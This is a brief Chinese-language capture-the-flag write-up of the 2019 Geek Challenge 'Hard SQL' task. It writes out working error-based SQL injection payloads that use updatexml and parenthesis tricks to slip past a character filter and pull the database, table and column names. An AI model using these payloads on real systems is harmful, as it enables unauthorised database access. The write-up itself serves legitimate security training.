[极客大挑战 2019]Hard SQL
首先试一下万能密码 ,发现报错
然后试一下单引号,发现要SQL注入
尝试了一些简单的SQL语句后发现很多字符都被过滤了,一直报错。
查一下数据库,admin'or(updatexml(1,concat(0x7e,database()),1))#
得到数据库名为geek,然后我们再查表
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#
得到表名H4rDsq1,再查字段名
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))#
得到字段名为id,username,password , 然后爆一下数据
拿到了一般的flag,因为只能显示32个字符所以flag没有显示完整,可以用left和right函数先查左边再查右边。
拼接一下就可以获得完整的flag